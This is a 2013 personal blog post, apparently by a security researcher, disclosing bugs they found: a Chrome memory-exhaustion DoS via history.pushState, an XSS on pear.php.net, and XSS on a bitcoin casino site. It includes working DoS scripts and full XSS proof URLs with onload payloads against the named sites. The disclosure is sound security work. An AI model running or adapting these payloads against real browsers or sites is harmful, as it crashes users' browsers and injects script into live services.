Monday, July 22, 2013

In the meantime...

Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:

  • Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
    <script>
    var r="BOMB!";for(var e=0;e<22;e++){r+=r;}
    for(var d=0;d<100000;d++) {
            history.pushState({},r);
    }
    </script>
    
    Live demo

    On android 4.2.2 @ nexus 7 this is quicker:
    <script>
    var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));}
    history.pushState({},r,r);
    </script>
    

  • pear.php.net XSS

    http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)

  • satoshiroulette.com (bitcoin casino) XSS :

    Examples:

    http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E

    http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E

No comments:

Post a Comment